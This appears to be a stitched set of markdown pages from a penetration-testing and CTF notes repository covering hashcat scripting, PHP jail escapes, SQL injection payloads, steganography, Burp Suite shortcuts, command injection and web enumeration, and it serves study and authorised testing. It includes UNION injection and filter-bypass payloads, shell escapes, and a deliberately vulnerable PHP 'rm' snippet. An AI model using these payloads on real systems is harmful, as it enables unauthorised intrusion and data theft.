echo '?a = ?l?u?d?s'
echo '?b = 0x00 - 0xff'

#basic execution syntax:
hashcat -D1,2 -O --force -a $attack_type -m $hash_id $hash_list $pass_list

#find out if hashcat has problems with blank variables
#|>if not then add variables for the proper flags + user input for mangling/masks
#|>ex: rules="-r $user_rules"
```

## Python

### Dealing with Sockets

[https://pequalsnp-team.github.io/cheatsheet/socket-basics-py-js-rb](https://pequalsnp-team.github.io/cheatsheet/socket-basics-py-js-rb)

### MISC

```python
import string


def is_plaintext(ptext):
    """Check a decryption candidate: True when at least 60% of its characters
    are ASCII letters, a rough signal that it is real plaintext."""
    if not ptext:          # avoid dividing by zero on empty output
        return False
    num_letters = sum(1 for c in ptext if c in string.ascii_letters)
    return num_letters / len(ptext) >= 0.6
```

--------------------------------------------------------------------------------
/os-agnostic/scripting/README.md:
--------------------------------------------------------------------------------

# Scripting

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

TODO: Separate Bash and Python scripting pages...and add more

## Bash

### Bash Scripting Basics

\[+\] Shebang:

```bash
#!/bin/bash
```

\[+\] Variables

```bash
name=Bob
echo $name
user=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.
```

\[+\] Simple script example

```bash
#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=$(ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1)
echo "Hello" $name "Your IP address is:" $ip
```

\[+\] User Input

```bash
read -p "IP: " IP
```

Example script with `read`

```bash
#!/bin/bash
echo "Please input the IP address"
read -p "IP: " IP
ping -c 5 $IP
```

\[+\] Check For No User Input

```bash
if [ -z "$domain" ]; then
  echo
  echo "#########################"
  echo
  echo "Invalid choice."
  echo
  exit
fi
```

\[+\] For loops

```bash
#!/bin/bash
for host in $(cat hosts.txt)
do
  echo $host
done
```

\[+\] Port Scan one liner

```bash
for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done
```

### Check for root privileges

When a user account is created, a numeric user ID is assigned to it. The Bash shell stores this real user ID in the `$UID` variable and the effective user ID in the `$EUID` variable. Under `sudo` or a setuid program it is the effective ID that becomes 0, so that is the one to test.

You can easily add a simple check at the start of a script to make sure it is being run with root privileges.

#### Old way to check for root privileges

```bash
#!/bin/bash

# Make sure only the root user can run the script
# Or it is run with sudo
if [ "$(id -u)" != "0" ]; then
   echo "This script must be run as root." 1>&2
   exit 1
fi
```

#### New way: Using EUID

```bash
#!/bin/bash

# Make sure only the root user can run our script
# Or it is run with sudo
if [[ $EUID -ne 0 ]]; then
   echo "This script must be run as root." 1>&2
   exit 1
fi
```

### MISC

[https://www.techbrown.com/most-useful-bash-scripts-linux-sysadmin/](https://www.techbrown.com/most-useful-bash-scripts-linux-sysadmin/)

```bash
wget https://raw.githubusercontent.com/sathisharthar/Admin-Scripts/master/sysinop
```

Add to `multitool.sh`: create wordlists with cewl & Hashcat; add options to use mangling rules.

Add to `multitool.sh`: crack passwords with Hashcat

```bash
#!/bin/bash
# Crack passwords with hashcat (planned addition to multitool.sh)

# Attack type menu with numeric selections (the values are hashcat's -a modes)
echo "Attack types:"
echo "  0) Straight (wordlist)    3) Brute-force / mask"
echo "  6) Hybrid wordlist+mask   7) Hybrid mask+wordlist"
read -rp "Attack type [0]: " attack_type
attack_type=${attack_type:-0}

# Hash type: search hashcat's help output by name, then prompt for the numeric id
read -rp "Hash type name to search for (e.g. ntlm, sha512crypt): " hash_selection
hashcat --help | grep -i -- "$hash_selection"
read -rp "Hash type id (-m): " hash_id

# File with hashes to crack; add --username if entries are in username:hash format
read -rp "File with hashes to crack: " hash_list
opts=()
read -rp "Does the hash list contain usernames (username:hash)? [y/N]: " has_users
[[ $has_users =~ ^[Yy] ]] && opts+=(--username)

# Wordlist (not used by a pure mask attack, -a 3)
pass_list=""
[ "$attack_type" != "3" ] && read -rp "Wordlist: " pass_list

# Optional mangling rules or mask
mask=""
read -rp "Apply a rules file (r), a mask (m) or neither (n)? [n]: " mangle
case "$mangle" in
  r) read -rp "Rules file: " user_rules; opts+=(-r "$user_rules") ;;
  m)
    echo "Built-in charsets:"
    echo '  ?l = abcdefghijklmnopqrstuvwxyz'
    echo '  ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    echo '  ?d = 0123456789'
    echo '  ?s =  !"#$%&'"'"'()*+,-./:;<=>?@[\]^_`{|}~'
    echo '  ?a = ?l?u?d?s'
    echo '  ?b = 0x00 - 0xff'
    echo "Custom charsets: -1 <chars> and -2 <chars>, then use ?1 / ?2 in the mask"
    read -rp "Custom charset -1 (optional): " cs1; [ -n "$cs1" ] && opts+=(-1 "$cs1")
    read -rp "Custom charset -2 (optional): " cs2; [ -n "$cs2" ] && opts+=(-2 "$cs2")
    read -rp "Mask (e.g. ?u?l?l?l?d?d): " mask ;;
esac

# Build the command as an array so empty variables never become stray arguments
cmd=(hashcat -D1,2 -O --force -a "$attack_type" -m "$hash_id" "${opts[@]}" "$hash_list")
case "$attack_type" in
  3) cmd+=("$mask") ;;
  6) cmd+=("$pass_list" "$mask") ;;
  7) cmd+=("$mask" "$pass_list") ;;
  *) cmd+=("$pass_list") ;;
esac
"${cmd[@]}"
```

## Python

### Python Functions

* Files: [https://www.w3schools.com/python/python\_ref\_file.asp](https://www.w3schools.com/python/python_ref_file.asp)
* Strings: [https://www.w3schools.com/python/python\_ref\_string.asp](https://www.w3schools.com/python/python_ref_string.asp)
* Keywords: [https://www.w3schools.com/python/python\_ref\_keywords.asp](https://www.w3schools.com/python/python_ref_keywords.asp)
* Random: [https://www.w3schools.com/python/module\_random.asp](https://www.w3schools.com/python/module_random.asp)

### Dealing with Sockets

[https://pequalsnp-team.github.io/cheatsheet/socket-basics-py-js-rb](https://pequalsnp-team.github.io/cheatsheet/socket-basics-py-js-rb)

### MISC

```python
import string

# Checks the output from a decryption attempt and returns True if at least 60%
# of the characters are ASCII letters (a sign of possible plaintext)
def is_plaintext(ptext):
    if not ptext:
        return False
    num_letters = sum(1 for c in ptext if c in string.ascii_letters)
    return num_letters / len(ptext) >= 0.6
```

## PHP

### PHP Functions

* Files: [https://www.w3schools.com/php/php\_ref\_filesystem.asp](https://www.w3schools.com/php/php_ref_filesystem.asp)
* Directories: [https://www.w3schools.com/php/php\_ref\_directory.asp](https://www.w3schools.com/php/php_ref_directory.asp)
* Errors: [https://www.w3schools.com/php/php\_ref\_error.asp](https://www.w3schools.com/php/php_ref_error.asp)
* Network: [https://www.w3schools.com/php/php\_ref\_network.asp](https://www.w3schools.com/php/php_ref_network.asp)
* Misc: [https://www.w3schools.com/php/php\_ref\_misc.asp](https://www.w3schools.com/php/php_ref_misc.asp)

### PHP Server

[https://www.php.net/manual/en/features.commandline.webserver.php](https://www.php.net/manual/en/features.commandline.webserver.php)

When starting `php -S` on a Mac \(in my case macOS Sierra\) to host a local server, I had trouble with connecting from legacy Java. As it turned out, if you started the PHP server with `php -S localhost:80` the server will be started with IPv6 support only! To access it via IPv4, you need to change the start-up command like so: `php -S 127.0.0.1:80`, which starts the server in IPv4 mode only.

It's not mentioned directly, and may not be obvious, but you can also use this to create a virtual host. This, of course, requires the help of your hosts file. Here are the steps:

```text
1. /etc/hosts
   127.0.0.1 www.example.com
2. cd [root folder]
   php -S www.example.com:8000
3. Browser:
   http://www.example.com:8000/index.php
```

In order to set project-specific configuration options, simply add a php.ini file to your project, and then run the built-in server with this flag: `php -S localhost:8000 -c php.ini`

Example \#6 Accessing the CLI Web Server From Remote Machines

You can make the web server accessible on port 8000 to any interface with: `$ php -S 0.0.0.0:8000`

Example \#2 Starting with a specific document root directory

```text
$ cd ~/public_html
$ php -S localhost:8000 -t foo/
Listening on localhost:8000
Document root is /home/me/public_html/foo
```

### PHP Jail Escape

_With file\_get\_contents\(\)_

```php
print file_get_contents('flag.txt');
```

_With readfile\(\)_

```php
echo readfile("flag.txt");
```

_With popen\(\)_

```php
popen("vi", "w");
// then, inside vi:
//   :r flag.txt
// or
//   :!/bin/bash
```

_With highlight\_file\(\)_

```php
highlight_file(glob("flag.txt")[0]);
// or
highlight_file(glob("fl*txt")[0]);
```

_With highlight\_source\(\)_

```php
highlight_source("flag.txt");
// or
highlight_source(glob("*")[4]);
```

_With Finfo\(\)_

```php
new Finfo(0,glob(hex2bin(hex2bin(3261)))[0]);
```

If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!

--------------------------------------------------------------------------------
/os-agnostic/sql.md:
--------------------------------------------------------------------------------

# SQL

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## SQLi - SQL Injection

* [SQL Injection Cheatsheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [https://portswigger.net/web-security/sql-injection/cheat-sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)

Blind SQL injection UNION queries: [IppSec: HackTheBox - Charon](https://www.youtube.com/watch?v=\_csbKuOlmdE) use `CONCAT("x","x")`

### SQL Injection Tips

`--` -> Comments in Linux\
`--+` -> Comments in Windows\
`%23 (#)` -> Hash Symbol\
`%2527 (')` -> to bypass urldecode(urldecode(htmlspecialchars(, ENT\_QUOTES)));

### String concatenation

You can concatenate together multiple strings to make a single string.

| Oracle | `'foo'\|\|'bar'` |
| ---------- | ---------------------------------------------------------------------------------------------------------------- |
| Microsoft | `'foo'+'bar'` |
| PostgreSQL | `'foo'\|\|'bar'` |
| MySQL | `'foo' 'bar'` [Note the space between the two strings]<br>`CONCAT('foo','bar')` |

### Substring

You can extract part of a string, from a specified offset with a specified length. Note that the offset index is 1-based. Each of the following expressions will return the string `ba`.

| Oracle | `SUBSTR('foobar', 4, 2)` |
| ---------- | --------------------------- |
| Microsoft | `SUBSTRING('foobar', 4, 2)` |
| PostgreSQL | `SUBSTRING('foobar', 4, 2)` |
| MySQL | `SUBSTRING('foobar', 4, 2)` |

### Comments

You can use comments to truncate a query and remove the portion of the original query that follows your input.

| Oracle | `--comment` |
| ---------- | -------------------------------------------------------------------------------------------------------------------------- |
| Microsoft | `--comment`<br>`/*comment*/` |
| PostgreSQL | `--comment`<br>`/*comment*/` |
| MySQL | `#comment`<br>`-- comment` [Note the space after the double dash]<br>`/*comment*/` |

### Database version

You can query the database to determine its type and version. This information is useful when formulating more complicated attacks.

| Oracle | `SELECT banner FROM v$version`<br>`SELECT version FROM v$instance` |
| ---------- | ---------------------------------------------------------------------------------------------------------------- |
| Microsoft | `SELECT @@version` |
| PostgreSQL | `SELECT version()` |
| MySQL | `SELECT @@version` |

### Database contents

You can list the tables that exist in the database, and the columns that those tables contain.

| Oracle | `SELECT * FROM all_tables`<br>`SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'` |
| ---------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Microsoft | `SELECT * FROM information_schema.tables`<br>`SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'` |
| PostgreSQL | `SELECT * FROM information_schema.tables`<br>`SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'` |
| MySQL | `SELECT * FROM information_schema.tables`<br>`SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'` |

### Conditional errors

You can test a single boolean condition and trigger a database error if the condition is true.

| Oracle | `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual` |
| ---------- | --------------------------------------------------------------------------------------- |
| Microsoft | `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END` |
| PostgreSQL | `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END` |
| MySQL | `SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')` |

### Batched (or stacked) queries

You can use batched queries to execute multiple queries in succession. Note that while the subsequent queries are executed, the results are not returned to the application. Hence this technique is primarily of use in relation to blind vulnerabilities where you can use a second query to trigger a DNS lookup, conditional error, or time delay.

| Oracle | `Does not support batched queries.` |
| ---------- | ----------------------------------- |
| Microsoft | `QUERY-1-HERE; QUERY-2-HERE` |
| PostgreSQL | `QUERY-1-HERE; QUERY-2-HERE` |
| MySQL | `QUERY-1-HERE; QUERY-2-HERE` |

{% hint style="info" %}
**Note:** With MySQL, batched queries typically cannot be used for SQL injection. However, this is occasionally possible if the target application uses certain PHP or Python APIs to communicate with a MySQL database.
{% endhint %}

### Time delays

You can cause a time delay in the database when the query is processed. The following will cause an unconditional time delay of 10 seconds.

| Oracle | `dbms_pipe.receive_message(('a'),10)` |
| ---------- | ------------------------------------- |
| Microsoft | `WAITFOR DELAY '0:0:10'` |
| PostgreSQL | `SELECT pg_sleep(10)` |
| MySQL | `SELECT sleep(10)` |

### Conditional time delays

You can test a single boolean condition and trigger a time delay if the condition is true.

| Oracle | `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'\|\|dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual` |
| ---------- | ---------------------------------------------------------------------------------------------------------------- |
| Microsoft | `IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'` |
| PostgreSQL | `SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END` |
| MySQL | `SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')` |

### Manual UNION SQLite Injection

_Table_

```sql
1' union all select 1,tbl_name,3 FROM sqlite_master WHERE type='table' limit 0,1 --
```

_Columns (as command)_

```sql
1' union all select 1,sql,3 FROM sqlite_master WHERE type='table' and tbl_name='nameoftable' limit 0,1 --
```

_Values (payload depends on the columns structure)_

```sql
1' union all select 1,"nameofcolumn",3 FROM "nameoftable" limit 2,1 --
```

### Manual UNION SQL Injection

_Table_

```sql
1' union select (select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),2#
```

_Columns_

```sql
1' union select (select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='nameoftable'),2#
```

_Values_

```sql
1' union select (select nameofcolumn from nameoftable limit 0,1),2#
```

_Using Newline_

```sql
admin %0A union %0A select %0A 1,database()#
-- or
admin %0A union %0A select %0A database(),2#
```

_Bypass preg\_replace_

```sql
ununionion select 1,2%23
-- or
UNunionION SEselectLECT 1,2,3%23
```

## Misc

Get a shell from the mysql client: `\! /bin/sh`

If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!

--------------------------------------------------------------------------------
/os-agnostic/steganography.md:
--------------------------------------------------------------------------------

# Steganography

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Steganography Checklist

TODO: clean up steganography CTF checklist \(issue [\#17](https://github.com/zweilosec/Infosec-Notes/issues/17)\)

* Properly link all tools and attributions
* Add description for what the checklist is for
* Make sure all tools still exist
* Check author's site for updates
* Add "Resources" section at bottom
* Find link for "feature for randomizing the color palette" \(section 10.ii\) on author's site
* credit to [Ge0rg3](https://github.com/Ge0rg3) for this great checklist. His site also has custom examples for each situation below.

* File
  1. Just to be sure what filetype you are facing, check with `type <file>`.
  2. If something seems strange, the next step would be to open the file with `GHex` and check the file's "magic bytes". Sometimes they are missing, or have been corrupted or obscured.
* Strings
  1. View all strings in the file with `strings -n 6 -t x <file>`.
     1. I typically use `-n 6` to find strings of length 6+, and `-t x` to view their position in the file.
  2. Alternatively, you can view strings on [this site](https://georgeom.net/StegOnline/upload) once an image has been uploaded.
* Exif
  1. Check all image metadata. I would recommend [Jeffrey's Image Metadata Viewer](http://exif.regex.info/exif.cgi) for in-depth analysis. `Exiftool` is another common one.
* Binwalk
  1. Next you can use `binwalk` to check images for hidden embedded files.
  2. My preferred syntax is `binwalk -Me <file>`. `-Me` is used to recursively extract any files.
* pngcheck
  1. We can use `pngcheck` to look for optional/correct broken chunks. This is vital if the image appears corrupt.
  2. Run `pngcheck -vtp7f <file>` to view all info.
  3. `-v` is for verbose, `-t` and `-7` display tEXt chunks, `-p` displays contents of some other optional chunks and `-f` forces continuation if major errors are encountered.
  4. Related write-ups: PlaidCTF 2015, SECCON Quals 2015
* Explore Color & Bit Planes
  1. Images can be hidden inside of the color/bit planes. Upload your image to [this site](https://georgeom.net/StegOnline/upload), then on the image menu page explore all options in the top panel \(i.e. Full Red, Inverse, LSB etc\).
  2. Go to "Browse Bit Planes", and browse through all available planes.
  3. If there appears to be some static at the top of any planes, try extracting the data from them in the "Extract Files/Data" menu.
  4. Related write-ups: MicroCTF 2017, CSAW Quals 2016, ASIS Cyber Security Contest Quals 2014, Cybersocks Regional 2016
* Extract Least Significant Bit \(LSB\) Data
  1. As mentioned in step 6.3, there could be some static in bit planes. If so, navigate to the "Extract Files/Data" page, and select the relevant bits.
* Check RGB Values
  1. ASCII Characters/other data can be hidden in the RGB\(A\) values of an image.
  2. Upload your image [here](https://georgeom.net/StegOnline/upload) and preview the RGBA values. Try converting them to text, and see if any flag is found. It might be worth looking at just the R/G/B/A values on their own.
  3. Related write-ups: MMA-CTF-2015
* Steghide
  1. Found a password? \(Or not?\)
  2. If you've found a password, the go-to application to check should be `steghide`. Bear in mind that this can sometimes be used without a password, too.
  3. You can extract data by running `steghide extract -sf <file>`.
  4. Other stego tools \(may need passwords to retrieve information\):
     1. OpenStego
     2. Stegpy
     3. Outguess
     4. jphide
  5. Associated writeups: Pragyan CTF 2017, Xiomara 2019, CSAW Quals 2015, BlackAlps Y-NOT-CTF \(JFK Challenge\)
* Browse Color Palette
  1. If the PNG is in type 3, you should look through the color palette.
  2. This site \(TODO: find site link\) has a feature for randomizing the color palette, which may reveal the flag. You can also browse through each color in the palette, if the flag is the same color.
  3. It may also be worth looking at the palette indexes themselves, as a string may be visible from there.
  4. Related write-ups: Plain CTF 2014
* Pixel Value Differencing \(PVD/MPVD\)
  1. This is a method where the differences between pixel pairs are measured and slightly adjusted in order to hide data.
  2. It would be rare to have a case of PVD where you're not explicitly told \(or perhaps hinted at\) that this is the steganographic method, as it's very niche.
  3. Related write-ups: TJCTF 2019, MMA-CTF 2015

## Misc

`StegCracker` - [https://pypi.org/project/stegcracker/](https://pypi.org/project/stegcracker/) - bruteforce tool for finding `steghide` passwords and extracting the data \(works well, uses `rockyou.txt` as default wordlist\)

Extract files from stego'd files: `binwalk -Me <file>`

[http://bigwww.epfl.ch/demo/ip/demos/FFT/](http://bigwww.epfl.ch/demo/ip/demos/FFT/) - Fast Fourier Transform online tool. Check this to test stego images that can't be solved with other tools.

* [https://0xrick.github.io/lists/stego/](https://0xrick.github.io/lists/stego/)
* [https://github.com/DominicBreuker/stego-toolkit/blob/master/README.md\#tools](https://github.com/DominicBreuker/stego-toolkit/blob/master/README.md#tools)
* [https://pequalsnp-team.github.io/cheatsheet/steganography-101](https://pequalsnp-team.github.io/cheatsheet/steganography-101)

## References

* [https://georgeom.net/StegOnline/checklist](https://georgeom.net/StegOnline/checklist)

If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!

--------------------------------------------------------------------------------
/tools-cheatsheets/README.md:
--------------------------------------------------------------------------------

---
description: A collection of outside resources on various InfoSec-related subjects.
---

# Tools & Cheatsheets

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Useful Tools

* [https://app.diagrams.net/](https://app.diagrams.net/)
  * Network Diagramming \(Free Online Visio Replacement\)

## OSCP Cheatsheets

* [https://github.com/s0wr0b1ndef/OSCP-Biggest-Reference-Bank/blob/master/Cheatsheet\_PenTesting.txt](https://github.com/s0wr0b1ndef/OSCP-Biggest-Reference-Bank/blob/master/Cheatsheet_PenTesting.txt)
* [https://github.com/so87/OSCP-PwK/blob/master/Penetration%20Testing%20Tools.pdf](https://github.com/so87/OSCP-PwK/blob/master/Penetration%20Testing%20Tools.pdf)
* [https://securism.wordpress.com/oscp-notes-information-gathering/](https://securism.wordpress.com/oscp-notes-information-gathering/)
* [https://github.com/Elinpf/OSCP-survival-guide](https://github.com/Elinpf/OSCP-survival-guide)
* [https://oscp.infosecsanyam.in/cheatsheet-short](https://oscp.infosecsanyam.in/cheatsheet-short)
* [https://github.com/slyth11907/Cheatsheets](https://github.com/slyth11907/Cheatsheets)
* [https://oscp.infosecsanyam.in/one-page-methodology](https://oscp.infosecsanyam.in/one-page-methodology)
* [https://github.com/The-Lynx-Team/OSCP](https://github.com/The-Lynx-Team/OSCP)

## CTF Cheatsheets

* [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) <-- RSA cracking tools // "un-cipher" data from a weak public key and try to recover the private key
* [https://www.capturetheflags.com/tools-for-ctf/](https://www.capturetheflags.com/tools-for-ctf/) <-- Has both Linux and Windows
* [https://github.com/apsdehal/aWEsoMe-cTf](https://github.com/apsdehal/aWEsoMe-cTf)
* [https://github.com/zardus/ctf-tools](https://github.com/zardus/ctf-tools)
* [https://dvd848.github.io/CTFs/](https://dvd848.github.io/CTFs/)
* [https://github.com/ryanking13/ctf-cheatsheet](https://github.com/ryanking13/ctf-cheatsheet)
* [https://github.com/w181496/Web-CTF-Cheatsheet](https://github.com/w181496/Web-CTF-Cheatsheet)

## Infosec Cheatsheets

* [https://nikolaskama.me/infosec-cheat-sheets/](https://nikolaskama.me/infosec-cheat-sheets/)
* [https://www.peerlyst.com/posts/the-complete-list-of-infosec-related-cheat-sheets-claus-cramon](https://www.peerlyst.com/posts/the-complete-list-of-infosec-related-cheat-sheets-claus-cramon)

## Scripting Cheatsheets

* [https://pequalsnp-team.github.io/cheatsheet/socket-basics-py-js-rb](https://pequalsnp-team.github.io/cheatsheet/socket-basics-py-js-rb)

## Cryptography Cheatsheets

* [https://pequalsnp-team.github.io/cheatsheet/crypto-101](https://pequalsnp-team.github.io/cheatsheet/crypto-101)

## Steganography Cheatsheets

* [https://georgeom.net/StegOnline/checklist](https://georgeom.net/StegOnline/checklist)

## MISC

[https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)

If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!

--------------------------------------------------------------------------------
/web/burp-suite.md:
--------------------------------------------------------------------------------

# Burp Suite

## Burp Cheat Sheet

[Burp Suite](https://portswigger.net/burp) is a web application security testing framework by PortSwigger.

Below is a selection of commands for improving your workflow.

## Global commands

| Command | Action |
| -------------- | --------------------------------- |
| `Ctrl+R` | Send to Repeater |
| `Ctrl+I` | Send to Intruder |
| `Ctrl+T` | Toggle Proxy interception |
| `Ctrl+F` | Forward intercepted Proxy message |
| `Ctrl+Shift+T` | Switch to Target |
| `Ctrl+Shift+P` | Switch to Proxy |
| `Ctrl+Shift+R` | Switch to Repeater |
| `Ctrl+Shift+S` | Switch to Scanner |
| `Ctrl+Shift+I` | Switch to Intruder |
| `Ctrl+Shift+O` | Switch to Suite options |
| `Ctrl+Shift+A` | Switch to Alerts tab |
| `Ctrl+Equals` | Go to next tab |
| `Ctrl+Minus` | Go to previous tab |

## Editor commands

| Command | Action |
| ------------------ | ------------------------------------------- |
| `Ctrl+S` | Search |
| `Ctrl+Period` | Go to next search match |
| `Ctrl+Comma` | Go to previous search match |
| `Ctrl+U` | URL-encode current selection |
| `Ctrl+Shift+U` | URL-decode current selection |
| `Ctrl+H` | HTML-encode current selection |
| `Ctrl+Shift+H` | HTML-decode current selection |
| `Ctrl+B` | Base64-encode current selection |
| `Ctrl+Shift+B` | Base64-decode current selection |
| `Ctrl+Delete` | Delete word |
| `Ctrl+Backspace` | Backspace word |
| `Ctrl+D` | Delete line |
| `Ctrl+Right` | Go to next word |
| `Ctrl+Shift+Right` | Go to next word (extend selection) |
| `Ctrl+Left` | Go to previous word |
| `Ctrl+Shift+Left` | Go to previous word (extend selection) |
| `Ctrl+Down` | Go to next paragraph |
| `Ctrl+Shift+Down` | Go to next paragraph (extend selection) |
| `Ctrl+Up` | Go to previous paragraph |
| `Ctrl+Shift+Up` | Go to previous paragraph (extend selection) |
| `Ctrl+Home` | Go to start of document |
| `Ctrl+Shift+Home` | Go to start of document (extend selection) |
| `Ctrl+End` | Go to end of document |
| `Ctrl+Shift+End` | Go to end of document (extend selection) |

## References

* https://github.com/mccabe615/BurpCheatSheet

--------------------------------------------------------------------------------
/web/web-notes/command-injection.md:
--------------------------------------------------------------------------------

# Command Injection

## Command Injection

{% embed url="https://owasp.org/www-community/attacks/Command_Injection" %}

### PHP Command Injection

The following PHP code snippet is vulnerable to a command injection attack: user input from the query string is pasted straight into a shell command line, so shell metacharacters in `filename` are interpreted by the shell.

```php
<?php
print("Please specify the name of the file to delete");
print("<p>");
$file=$_GET['filename'];
system("rm $file");
?>
```

The following request is an example of a successful attack on the previous PHP code, and will output the results of the `id` command: `http://127.0.0.1/delete.php?filename=bob.txt;id`. Look for exposed `$_GET['filename']`-type variables that take input from the user, or can be injected into from the URL. Combined with `system("")`, this allows command injection.

--------------------------------------------------------------------------------
/web/web-notes/enumeration.md:
--------------------------------------------------------------------------------

# Enumeration

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Web Application Enumeration

[w3af](http://w3af.org/) is an open source Python-based Web Application Attack and Audit Framework.

> The project's goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.

It can also be abused by attackers to find and enumerate weaknesses in web applications. It can be downloaded and run with the following commands:

```bash
git clone --depth 1 https://github.com/andresriancho/w3af.git
cd w3af
./w3af_gui
```

## HTTP Enumeration

### Subdomain enumeration

[https://sidxparab.gitbook.io/subdomain-enumeration-guide/](https://sidxparab.gitbook.io/subdomain-enumeration-guide/)

### dirsearch

[https://github.com/maurosoria/dirsearch](https://github.com/maurosoria/dirsearch)

```
python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist
```

### gobuster

```
gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
```

### DirBuster - HTTP folder enumeration - can take a dictionary file

### Dirb

* Directory brute force finding using a dictionary file

```
dirb http://$ip/ wordlist.dict

dirb <>
```

* Dirb against a proxy

```
dirb http://$ip/ -p $ip:$port
```

### Nikto

```
nikto -h $ip
```

* Proxy Enumeration (useful for open proxies)

```
nikto -useproxy http://$ip:3128 -h $ip
```

### Nmap HTTP Enumeration

```
nmap --script=http-enum -p80 -n $ip/24
```

* Nmap: check the server methods

```
nmap --script http-methods --script-args http-methods.url-path='/test' $ip
```

### Uniscan

Directory finder:

```
uniscan -qweds -u <>
```

### Wfuzz - The web brute forcer

```
wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test

wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"

wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ
```

* Recurse level 3

```
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ
```

### Misc

* Get Options available from web server

```
curl -vX OPTIONS vm/test
```

* Open a service using a port knock (secured with Knockd)

```
for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x server_ip_address; done
```

* WordPress Scan - WordPress security scanner

```
wpscan --url $ip/blog --proxy $ip:3129
```

* RSH Enumeration - Unencrypted file transfer system

```
auxiliary/scanner/rservices/rsh_login
```

* Finger Enumeration

```
finger @$ip

finger batman@$ip
```

* TLS & SSL Testing

```
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html
```

--------------------------------------------------------------------------------
/web/web-notes/the-web-application-hackers-handbook.md:
--------------------------------------------------------------------------------

---
description: Web Application Hacker's Handbook Task Checklist
---

# The Web Application Hacker's Handbook

Based on the original _Web Application Hacker's Handbook_, this project was revamped as a free online training site at [https://portswigger.net/web-security](https://portswigger.net/web-security). The author of the original books worked in conjunction with Portswigger to create the Web Security Academy. The checklist below is meant as a methodology to complement their training.

## Task Checklist

### Recon and analysis

* [ ] Map visible content
* [ ] Discover hidden & default content
* [ ] Test for debug parameters
* [ ] Identify data entry points
* [ ] Identify the technologies used
* [ ] Map the attack surface

### Test handling of Identity and Access Management (IAM)

* [ ] Authentication
  * [ ] Test password quality rules
  * [ ] Test for username enumeration
  * [ ] Test resilience to password guessing
  * [ ] Test any account recovery function
  * [ ] Test any "remember me" function
  * [ ] Test any impersonation function
  * [ ] Test username uniqueness
  * [ ] Check for unsafe distribution of credentials
  * [ ] Test for fail-open conditions
  * [ ] Test any multi-stage mechanisms
* [ ] Session handling
  * [ ] Test tokens for meaning
  * [ ] Test tokens for predictability
  * [ ] Check for insecure transmission of tokens
  * [ ] Check for disclosure of tokens in logs
  * [ ] Check mapping of tokens to sessions
  * [ ] Check session termination
  * [ ] Check for session fixation
  * [ ] Check for cross-site request forgery
  * [ ] Check cookie scope
* [ ] Access controls
  * [ ] Understand the access control requirements
  * [ ] Test effectiveness of controls, using multiple accounts if possible
  * [ ] Test for insecure access control methods (request parameters, Referer header, etc.)

### Test handling of input

* [ ] Fuzz all request parameters
* [ ] Test for SQL injection
* [ ] Identify all reflected data
